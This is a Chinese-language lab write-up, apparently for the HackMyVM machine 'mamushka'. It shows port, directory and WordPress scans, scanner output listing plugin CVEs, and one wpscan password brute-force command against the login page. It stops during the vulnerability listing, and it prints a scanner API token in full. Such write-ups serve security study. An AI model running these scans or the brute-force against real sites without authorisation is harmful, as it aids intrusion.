信息收集

IP定位

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# arp-scan -l | grep "08:00:27"
3

4
192.168.0.105   08:00:27:41:3c:f7       (Unknown)

rustscan扫描

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# rustscan -a 192.168.0.105 -- -A
3
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
4
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
5
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
6
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
7
The Modern Day Port Scanner.
8
________________________________________
9
: http://discord.skerritt.blog         :
10
: https://github.com/RustScan/RustScan :
11
 --------------------------------------
12
I scanned ports so fast, even my computer was surprised.
13

14
[~] The config file is expected to be at "/root/.rustscan.toml"
15
Open 192.168.0.105:22
16
Open 192.168.0.105:80
17
[~] Starting Script(s)
18
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.0.105
19
Depending on the complexity of the script, results may take some time to appear.
20
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-23 06:38 EST
21

22

23
PORT   STATE SERVICE REASON         VERSION
24
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
25
| ssh-hostkey:
26
|   256 b5:a4:7c:65:5c:1f:d7:89:42:bd:76:df:2c:8e:93:4e (ECDSA)
27
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP1XOWXFRA4APUDEG4a/hcbKUOu0DkzxCHuEoI2py6/DVQ0h9qNkjVO8oCJRPNwNRUI05sSCB7WCwUYWuX+oDuU=
28
|   256 5d:3d:2b:43:fc:89:fa:24:a3:f4:73:5f:7b:89:6c:e3 (ED25519)
29
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKNNjSS0msWGvbhNzXghC/zqaoTABTt/8T83ckjP31oo
30
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.61 ((Debian))
31
|_http-title: mamushka
32
| http-methods:
33
|_  Supported Methods: GET HEAD POST OPTIONS
34
|_http-server-header: Apache/2.4.61 (Debian)
35
MAC Address: 08:00:27:41:3C:F7 (Oracle VirtualBox virtual NIC)
36
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
37
Device type: general purpose
38
Running: Linux 4.X|5.X
39
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
40
OS details: Linux 4.15 - 5.8
41
TCP/IP fingerprint:
42
OS:SCAN(V=7.94SVN%E=4%D=1/23%OT=22%CT=%CU=41650%PV=Y%DS=1%DC=D%G=N%M=080027
43
OS:%TM=69735DB3%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II
44
OS:=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7
45
OS:%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%
46
OS:W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S
47
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
48
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
49
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
50
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
51
OS:I=N%T=40%CD=S)
52

53
Uptime guess: 6.169 days (since Sat Jan 17 02:34:29 2026)
54
Network Distance: 1 hop
55
TCP Sequence Prediction: Difficulty=263 (Good luck!)
56
IP ID Sequence Generation: All zeros
57
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
58

59
TRACEROUTE
60
HOP RTT     ADDRESS
61
1   0.34 ms 192.168.0.105

目录扫描

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# dirsearch -u 192.168.0.105
3

4
  _|. _ _  _  _  _ _|_    v0.4.3.post1
5
 (_||| _) (/_(_|| (_| )
6

7
Extensions: php, aspx, jsp, html, js | HTTP method: GET
8
Threads: 25 | Wordlist size: 11460
9

10
Output File: /home/kali/reports/_192.168.0.105/_26-01-23_06-45-05.txt
11

12
Target: http://192.168.0.105/
13

14
[06:45:05] Starting:
15
[06:45:38] 301 -    0B  - /index.php  ->  http://192.168.0.105/
16
[06:45:38] 301 -    0B  - /index.php/login/  ->  http://192.168.0.105/login/
17
[06:45:40] 200 -    7KB - /license.txt
18
[06:45:53] 200 -    3KB - /readme.html
19
[06:46:11] 301 -  317B  - /wp-admin  ->  http://192.168.0.105/wp-admin/
20
[06:46:11] 301 -  319B  - /wp-content  ->  http://192.168.0.105/wp-content/
21
[06:46:11] 200 -    0B  - /wp-content/
22
[06:46:11] 301 -  320B  - /wp-includes  ->  http://192.168.0.105/wp-includes/
23
[06:46:14] 200 -    0B  - /wp-cron.php
24
[06:46:14] 302 -    0B  - /wp-signup.php  ->  http://mamushka.hmv/wp-login.php?action=register
25
[06:46:15] 200 -    2KB - /wp-login.php
26
[06:46:17] 400 -    1B  - /wp-admin/admin-ajax.php
27
[06:46:23] 409 -    3KB - /wp-admin/setup-config.php
28

29
Task Completed

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# gobuster dir -u 192.168.0.105 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64
3

4
===============================================================
5
Gobuster v3.6
6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
7
===============================================================
8
[+] Url:                     http://192.168.0.105
9
[+] Method:                  GET
10
[+] Threads:                 64
11
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
12
[+] Negative Status codes:   404
13
[+] User Agent:              gobuster/3.6
14
[+] Extensions:              yaml,php,txt,html,zip,db,bak,js
15
[+] Timeout:                 10s
16
===============================================================
17
Starting gobuster in directory enumeration mode
18
===============================================================
19
/.html                (Status: 403) [Size: 278]
20
/index.php            (Status: 301) [Size: 0] [--> http://192.168.0.105/]
21
/wp-content           (Status: 301) [Size: 319] [--> http://192.168.0.105/wp-content/]
22
/wp-login.php         (Status: 200) [Size: 3931]
23
/license.txt          (Status: 200) [Size: 19915]
24
/wp-includes          (Status: 301) [Size: 320] [--> http://192.168.0.105/wp-includes/]
25
/readme.html          (Status: 200) [Size: 7409]
26
/wp-admin             (Status: 301) [Size: 317] [--> http://192.168.0.105/wp-admin/]
27
/wp-signup.php        (Status: 302) [Size: 0] [--> http://mamushka.hmv/wp-login.php?action=register]

1
Annie Steiner
2
CEO, Greenprint

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# wpscan --url mamushka.hmv
3
_______________________________________________________________
4
         __          _______   _____
5
         \ \        / /  __ \ / ____|
6
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
7
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
8
            \  /\  /  | |     ____) | (__| (_| | | | |
9
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
10

11
         WordPress Security Scanner by the WPScan Team
12
                         Version 3.8.28
13
       Sponsored by Automattic - https://automattic.com/
14
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
15
_______________________________________________________________
16

17
[+] URL: http://mamushka.hmv/ [192.168.0.105]
18
[+] Started: Fri Jan 23 20:19:36 2026
19

20
Interesting Finding(s):
21

22
[+] Headers
23
 | Interesting Entries:
24
 |  - Server: Apache/2.4.61 (Debian)
25
 |  - X-Powered-By: PHP/8.2.22
26
 | Found By: Headers (Passive Detection)
27
 | Confidence: 100%
28

29
[+] XML-RPC seems to be enabled: http://mamushka.hmv/xmlrpc.php
30
 | Found By: Direct Access (Aggressive Detection)
31
 | Confidence: 100%
32
 | References:
33
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
34
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
35
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
36
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
37
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
38

39
[+] WordPress readme found: http://mamushka.hmv/readme.html
40
 | Found By: Direct Access (Aggressive Detection)
41
 | Confidence: 100%
42

43
[+] The external WP-Cron seems to be enabled: http://mamushka.hmv/wp-cron.php
44
 | Found By: Direct Access (Aggressive Detection)
45
 | Confidence: 60%
46
 | References:
47
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
48
 |  - https://github.com/wpscanteam/wpscan/issues/1299
49

50
[+] WordPress version 6.9 identified (Latest, released on 2025-12-02).
51
 | Found By: Query Parameter In Install Page (Aggressive Detection)
52
 |  - http://mamushka.hmv/wp-includes/css/dashicons.min.css?ver=6.9
53
 |  - http://mamushka.hmv/wp-includes/css/buttons.min.css?ver=6.9
54
 |  - http://mamushka.hmv/wp-admin/css/forms.min.css?ver=6.9
55
 |  - http://mamushka.hmv/wp-admin/css/l10n.min.css?ver=6.9
56
 |  - http://mamushka.hmv/wp-admin/css/install.min.css?ver=6.9
57

58
[+] WordPress theme in use: twentytwentyfour
59
 | Location: http://mamushka.hmv/wp-content/themes/twentytwentyfour/
60
 | Last Updated: 2025-12-03T00:00:00.000Z
61
 | Readme: http://mamushka.hmv/wp-content/themes/twentytwentyfour/readme.txt
62
 | [!] The version is out of date, the latest version is 1.4
63
 | Style URL: http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css
64
 | Style Name: Twenty Twenty-Four
65
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
66
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
67
 | Author: the WordPress team
68
 | Author URI: https://wordpress.org
69
 |
70
 | Found By: Urls In Homepage (Passive Detection)
71
 |
72
 | Version: 1.2 (80% confidence)
73
 | Found By: Style (Passive Detection)
74
 |  - http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.2'
75

76
[+] Enumerating All Plugins (via Passive Methods)
77
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
78

79
[i] Plugin(s) Identified:
80

81
[+] ultimate-member
82
 | Location: http://mamushka.hmv/wp-content/plugins/ultimate-member/
83
 | Last Updated: 2025-12-16T20:04:00.000Z
84
 | [!] The version is out of date, the latest version is 2.11.1
85
 |
86
 | Found By: Urls In Homepage (Passive Detection)
87
 |
88
 | Version: 2.8.6 (100% confidence)
89
 | Found By: Readme - Stable Tag (Aggressive Detection)
90
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
91
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
92
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
93

94
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
95
 Checking Config Backups - Time: 00:00:00 <> (0 / 137)   Checking Config Backups - Time: 00:00:00 <> (3 / 137)   Checking Config Backups - Time: 00:00:00 <> (15 / 137)  Checking Config Backups - Time: 00:00:00 <> (22 / 137)  Checking Config Backups - Time: 00:00:00 <> (32 / 137)  Checking Config Backups - Time: 00:00:00 <> (39 / 137)  Checking Config Backups - Time: 00:00:00 <> (47 / 137)  Checking Config Backups - Time: 00:00:00 <> (59 / 137)  Checking Config Backups - Time: 00:00:00 <> (70 / 137)  Checking Config Backups - Time: 00:00:00 <> (83 / 137)  Checking Config Backups - Time: 00:00:00 <> (96 / 137)  Checking Config Backups - Time: 00:00:00 <> (107 / 137) Checking Config Backups - Time: 00:00:00 <> (120 / 137) Checking Config Backups - Time: 00:00:00 <> (132 / 137) Checking Config Backups - Time: 00:00:00 <> (137 / 137) 100.00% Time: 00:00:00
96

97
[i] No Config Backups Found.
98

99
[!] No WPScan API Token given, as a result vulnerability data has not been output.
100
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
101

102
[+] Finished: Fri Jan 23 20:19:51 2026
103
[+] Requests Done: 178
104
[+] Cached Requests: 5
105
[+] Data Sent: 44.403 KB
106
[+] Data Received: 361.444 KB
107
[+] Memory used: 264.973 MB
108
[+] Elapsed time: 00:00:14

Ultimate Member 2.8.6（关键点）

当前版本：2.8.6
最新：2.11.1
历史上这个插件是漏洞重灾区：
- 未授权信息泄露
- 任意用户枚举
- 权限绕过
- profile / REST / AJAX 相关逻辑问题

XML-RPC 开启

XML-RPC 现在的价值主要是：

用户名存在性探测
弱口令 / 凭证复用（如果有用户名）
pingback 辅助攻击（有条件）

⚠️ 但：

WP 6.x + 默认配置
没拿到用户名前，收益有限

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# wpscan --url http://mamushka.hmv \
3
  -U admin \
4
  -P ../tools/wordlists/kali/rockyou.txt \
5
  --password-attack wp-login \
6
  -t 5

没爆出来

看了wp换个思路，我的wp扫的太少了，去注册apitoken

Wpscan扫描

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# wpscan --url http://mamushka.hmv -e u,ap --plugins-detection aggressive --api-token "NEzNxgvCrcyIZN1aYoHxHyUda29vcAIcsbaCrFngLA0"
3

4
_______________________________________________________________
5
         __          _______   _____
6
         \ \        / /  __ \ / ____|
7
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
8
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
9
            \  /\  /  | |     ____) | (__| (_| | | | |
10
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
11

12
         WordPress Security Scanner by the WPScan Team
13
                         Version 3.8.28
14
       Sponsored by Automattic - https://automattic.com/
15
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
16
_______________________________________________________________
17

18
[+] URL: http://mamushka.hmv/ [192.168.0.105]
19
[+] Started: Fri Jan 23 20:36:05 2026
20

21
Interesting Finding(s):
22

23
[+] Headers
24
 | Interesting Entries:
25
 |  - Server: Apache/2.4.61 (Debian)
26
 |  - X-Powered-By: PHP/8.2.22
27
 | Found By: Headers (Passive Detection)
28
 | Confidence: 100%
29

30
[+] XML-RPC seems to be enabled: http://mamushka.hmv/xmlrpc.php
31
 | Found By: Direct Access (Aggressive Detection)
32
 | Confidence: 100%
33
 | References:
34
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
35
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
36
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
37
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
38
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
39

40
[+] WordPress readme found: http://mamushka.hmv/readme.html
41
 | Found By: Direct Access (Aggressive Detection)
42
 | Confidence: 100%
43

44
[+] The external WP-Cron seems to be enabled: http://mamushka.hmv/wp-cron.php
45
 | Found By: Direct Access (Aggressive Detection)
46
 | Confidence: 60%
47
 | References:
48
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
49
 |  - https://github.com/wpscanteam/wpscan/issues/1299
50

51
[+] WordPress version 6.9 identified (Latest, released on 2025-12-02).
52
 | Found By: Query Parameter In Install Page (Aggressive Detection)
53
 |  - http://mamushka.hmv/wp-includes/css/dashicons.min.css?ver=6.9
54
 |  - http://mamushka.hmv/wp-includes/css/buttons.min.css?ver=6.9
55
 |  - http://mamushka.hmv/wp-admin/css/forms.min.css?ver=6.9
56
 |  - http://mamushka.hmv/wp-admin/css/l10n.min.css?ver=6.9
57
 |  - http://mamushka.hmv/wp-admin/css/install.min.css?ver=6.9
58

59
[+] WordPress theme in use: twentytwentyfour
60
 | Location: http://mamushka.hmv/wp-content/themes/twentytwentyfour/
61
 | Last Updated: 2025-12-03T00:00:00.000Z
62
 | Readme: http://mamushka.hmv/wp-content/themes/twentytwentyfour/readme.txt
63
 | [!] The version is out of date, the latest version is 1.4
64
 | Style URL: http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css
65
 | Style Name: Twenty Twenty-Four
66
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
67
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
68
 | Author: the WordPress team
69
 | Author URI: https://wordpress.org
70
 |
71
 | Found By: Urls In Homepage (Passive Detection)
72
 |
73
 | Version: 1.2 (80% confidence)
74
 | Found By: Style (Passive Detection)
75
 |  - http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.2'
76

77
[+] Enumerating All Plugins (via Aggressive Methods)
78
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
79

80
[i] Plugin(s) Identified:
81

82
[+] akismet
83
 | Location: http://mamushka.hmv/wp-content/plugins/akismet/
84
 | Latest Version: 5.6
85
 | Last Updated: 2025-11-12T16:31:00.000Z
86
 |
87
 | Found By: Known Locations (Aggressive Detection)
88
 |  - http://mamushka.hmv/wp-content/plugins/akismet/, status: 403
89
 |
90
 | [!] 1 vulnerability identified:
91
 |
92
 | [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
93
 |     Fixed in: 3.1.5
94
 |     References:
95
 |      - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c
96
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
97
 |      - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
98
 |      - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
99
 |
100
 | The version could not be determined.
101

102
[+] meta-generator-and-version-info-remover
103
 | Location: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/
104
 | Last Updated: 2025-09-23T17:32:00.000Z
105
 | Readme: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
106
 | [!] The version is out of date, the latest version is 17.1
107
 |
108
 | Found By: Known Locations (Aggressive Detection)
109
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/, status: 403
110
 |
111
 | Version: 16.0 (100% confidence)
112
 | Found By: Readme - Stable Tag (Aggressive Detection)
113
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
114
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
115
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
116

117
[+] ultimate-member
118
 | Location: http://mamushka.hmv/wp-content/plugins/ultimate-member/
119
 | Last Updated: 2025-12-16T20:04:00.000Z
120
 | Readme: http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
121
 | [!] The version is out of date, the latest version is 2.11.1
122
 |
123
 | Found By: Known Locations (Aggressive Detection)
124
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/, status: 403
125
 |
126
 | [!] 13 vulnerabilities identified:
127
 |
128
 | [!] Title: Ultimate Member < 2.8.7 - Cross-Site Request Forgery to Membership Status Change
129
 |     Fixed in: 2.8.7
130
 |     References:
131
 |      - https://wpscan.com/vulnerability/2b670a80-2682-4b7f-a549-64a35345e630
132
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8520
133
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffddc03-d4ae-460e-972a-98804d947d09
134
 |
135
 | [!] Title: Ultimate Member < 2.8.7 - Authenticated (Contributor+) Stored Cross-Site Scripting
136
 |     Fixed in: 2.8.7
137
 |     References:
138
 |      - https://wpscan.com/vulnerability/7488f9f3-03ea-4f4e-b5fb-c0dd02c5bb59
139
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8519
140
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/9e394bb2-d505-4bf1-b672-fea3504bf936
141
 |
142
 | [!] Title: Ultimate Member < 2.9.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Profile Picture Update
143
 |     Fixed in: 2.9.0
144
 |     References:
145
 |      - https://wpscan.com/vulnerability/54a53b30-4249-4559-85f8-7aeac2dc0df2
146
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10528
147
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/0a9793b6-2186-46ef-b204-d8f8f154ebf3
148
 |
149
 | [!] Title: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin < 2.9.2 - Information Exposure
150
 |     Fixed in: 2.9.2
151
 |     References:
152
 |      - https://wpscan.com/vulnerability/cb9c5ef8-51f8-4a46-ae56-23302c5980aa
153
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0318
154
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ee149bf-ffa3-4906-8be2-9c3c40b28287
155
 |
156
 | [!] Title: Ultimate Member < 2.9.2 - Unauthenticated SQL Injection
157
 |     Fixed in: 2.9.2
158
 |     References:
159
 |      - https://wpscan.com/vulnerability/31ef60db-4847-4623-a194-8722e668e6ab
160
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0308
161
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/e3e5bb98-2652-499a-b8cd-4ebfe1c1d890
162
 |
163
 | [!] Title: Ultimate Member < 2.10.0 - Authenticated SQL Injection
164
 |     Fixed in: 2.10.0
165
 |     References:
166
 |      - https://wpscan.com/vulnerability/90b5192a-ceee-4612-8e21-2341bae29cad
167
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12276
168
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/846f9828-2f1f-4d08-abfb-909b8d634d8a
169
 |
170
 | [!] Title: Ultimate Member < 2.10.1 - Unauthenticated SQLi
171
 |     Fixed in: 2.10.1
172
 |     References:
173
 |      - https://wpscan.com/vulnerability/1d39ff72-1178-4812-be55-9bf4b58bbbb6
174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1702
175
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/34adbae5-d615-4f8d-a845-6741d897f06c
176
 |
177
 | [!] Title: Ultimate Member <= 2.10.3 - Admin+ Arbitrary Function Call
178
 |     Fixed in: 2.10.4
179
 |     References:
180
 |      - https://wpscan.com/vulnerability/abc6e35c-d971-4c8f-bcd0-70c7e16ec067
181
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47691
182
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8b33c7-23ef-4b5c-bdb9-b4e548d18832
183
 |
184
 | [!] Title: Ultimate Member < 2.10.2 - Unauthenticated Blind SQL Injection
185
 |     Fixed in: 2.10.2
186
 |     References:
187
 |      - https://wpscan.com/vulnerability/76ea92aa-36c6-4455-b9ee-e4ed22202235
188
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f539e25-5483-417d-a3c5-e7034c03c673
189
 |
190
 | [!] Title: Ultimate Member < 2.11.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting via 'value'
191
 |     Fixed in: 2.11.1
192
 |     References:
193
 |      - https://wpscan.com/vulnerability/9e9bc669-9105-4066-8e3e-3c6db9e62e91
194
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13217
195
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/876b57e0-cf1e-4ce9-ba85-a5d4554797bd
196
 |
197
 | [!] Title: Ultimate Member < 2.11.1 - Authenticated (Subscriber+) Profile Privacy Setting Bypass
198
 |     Fixed in: 2.11.1
199
 |     References:
200
 |      - https://wpscan.com/vulnerability/74b2060e-2580-4623-bd0f-c79571c422db
201
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-14081
202
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/aad57a68-c385-491f-a5a2-32906df4b52b
203
 |
204
 | [!] Title: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin < 2.11.1 - Unauthenticated Sensitive Information Exposure
205
 |     Fixed in: 2.11.1
206
 |     References:
207
 |      - https://wpscan.com/vulnerability/4519fed7-8a57-4f57-88f0-bbb3940b3811
208
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-12492
209
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/61337d2d-d15a-45f2-b730-fc034eb3cd31
210
 |
211
 | [!] Title: Ultimate Member < 2.11.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
212
 |     Fixed in: 2.11.1
213
 |     References:
214
 |      - https://wpscan.com/vulnerability/71513392-aebb-4a11-bf48-4833a7267d5b
215
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13220
216
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c06548-238d-4b75-8f20-d7de6fc21539
217
 |
218
 | Version: 2.8.6 (100% confidence)
219
 | Found By: Readme - Stable Tag (Aggressive Detection)
220
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
221
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
222
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
223

224
[+] wp-automatic
225
 | Location: http://mamushka.hmv/wp-content/plugins/wp-automatic/
226
 | Latest Version: 3.130.0
227
 | Last Updated: 2026-01-18T12:55:56.000Z
228
 |
229
 | Found By: Known Locations (Aggressive Detection)
230
 |  - http://mamushka.hmv/wp-content/plugins/wp-automatic/, status: 200
231
 |
232
 | [!] 9 vulnerabilities identified:
233
 |
234
 | [!] Title: Automatic 2.0.3 - csv.php q Parameter SQL Injection
235
 |     Fixed in: 2.0.4
236
 |     References:
237
 |      - https://wpscan.com/vulnerability/dadc99ca-54ee-42b4-b247-79a47b884f03
238
 |      - https://www.exploit-db.com/exploits/19187/
239
 |      - https://packetstormsecurity.com/files/113763/
240
 |
241
 | [!] Title: WordPress Automatic < 3.53.3 - Unauthenticated Arbitrary Options Update
242
 |     Fixed in: 3.53.3
243
 |     References:
244
 |      - https://wpscan.com/vulnerability/4e5202b8-7317-4a10-b9f3-fd6999192e15
245
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4374
246
 |      - https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/
247
 |
248
 | [!] Title: Automatic < 3.92.1 - Cross-Site Request Forgery to Privilege Escalation
249
 |     Fixed in: 3.92.1
250
 |     References:
251
 |      - https://wpscan.com/vulnerability/fa2f3687-7a5f-4781-8284-6fbea7fafd0e
252
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27955
253
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/12adf619-4be8-4ecf-8f67-284fc44d87d0
254
 |
255
 | [!] Title: Automatic < 3.92.1 - Unauthenticated Arbitrary File Download and Server-Side Request Forgery
256
 |     Fixed in: 3.92.1
257
 |     References:
258
 |      - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266
259
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
260
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/620e8931-64f0-4d9c-9a4c-1f5a703845ff
261
 |
262
 | [!] Title: Automatic < 3.92.1 - Unauthenticated SQL Injection
263
 |     Fixed in: 3.92.1
264
 |     References:
265
 |      - https://wpscan.com/vulnerability/53a51e79-a216-4ca3-ac2d-57098fd2ebb5
266
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27956
267
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/a8b319be-f312-4d02-840f-e2a91c16b67a
268
 |
269
 | [!] Title: WordPress Automatic Plugin < 3.93.0 Cross-Site Request Forgery
270
 |     Fixed in: 3.93.0
271
 |     References:
272
 |      - https://wpscan.com/vulnerability/e5d0dcec-41a7-40ae-b9ce-f839de9c28b8
273
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32693
274
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/6231e47e-2120-4746-97c1-2aa80aa18f4e
275
 |
276
 | [!] Title: WordPress Automatic < 3.95.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via autoplay Parameter
277
 |     Fixed in: 3.95.0
278
 |     References:
279
 |      - https://wpscan.com/vulnerability/d0198310-b323-476a-adf8-10504383ce1c
280
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4849
281
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/4be58bfa-d489-45f5-9169-db8bab718175
282
 |
283
 | [!] Title: WordPress Automatic Plugin - AI content generator and auto poster plugin < 3.116.0 - Authenticated (Author+) Arbitrary File Upload
284
 |     Fixed in: 3.116.0
285
 |     References:
286
 |      - https://wpscan.com/vulnerability/33c09e34-517c-4529-8538-e75cc96460bd
287
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5395
288
